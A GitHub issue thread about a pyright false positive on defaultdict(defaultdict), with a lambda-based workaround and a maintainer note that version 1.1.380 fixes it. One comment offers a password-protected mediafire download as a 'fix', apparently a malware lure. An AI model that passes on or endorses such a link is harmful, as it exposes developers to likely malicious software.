### ISSUE TITLE
False positive for `defaultdict(defaultdict)`

### ISSUE THREAD

**Issue by erictraut** [microsoft/pyright#8840]
### Discussed in https://github.com/microsoft/pyright/discussions/8839

<div type='discussions-op-text'>

<sup>Originally posted by **matt-the-midnight-hacker** August 26, 2024</sup>
Hi I just updated pyright to 1.1.377 and I get now type errors for `defaultdict(defaultdict)` assignments. I'm not sure if it is a bug or a typeshed issue or just me.

The code to reproduce what I mean would be:
```
from typing import DefaultDict
from collections import defaultdict

class MyClass:
    pass

d: DefaultDict[int, DefaultDict[int, MyClass]] = defaultdict(defaultdict)

d[1][2] = MyClass()
```
I get error:

`error: Expression of type "defaultdict[Unknown, defaultdict[Unknown, defaultdict[Unknown, Unknown]]]" is incompatible with declared type "DefaultDict[int, DefaultDict[int, MyClass]]`

How to do the `defaultdict` instantiation here to fulfill the type I've declared?

fyi. I've also asked this on [stackoverflow](https://stackoverflow.com/questions/78917316/how-to-instantiate-defaultdict-to-fulfill-defaultdictint-defaultdictint-mycl)</div>

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tofetpuzo** [comment]
A work around would be something like this 
```
from typing import DefaultDict
from collections import defaultdict

class MyClass:
    pass

d: DefaultDict[int, DefaultDict[int, MyClass]] = defaultdict(lambda: defaultdict(MyClass))

d[1][2] = MyClass()

```

Test for it could be 

```
d: DefaultDict[int, DefaultDict[int, MyClass]] = defaultdict(lambda: defaultdict(MyClass))

def func(a: DefaultDict[int, DefaultDict[int, MyClass]]):
    reveal_type(a)  # pyright should now reveal Runtime type is 'defaultdict'

func(d)
```

**Comment by erictraut** [comment]
This is addressed in pyright 1.1.380.
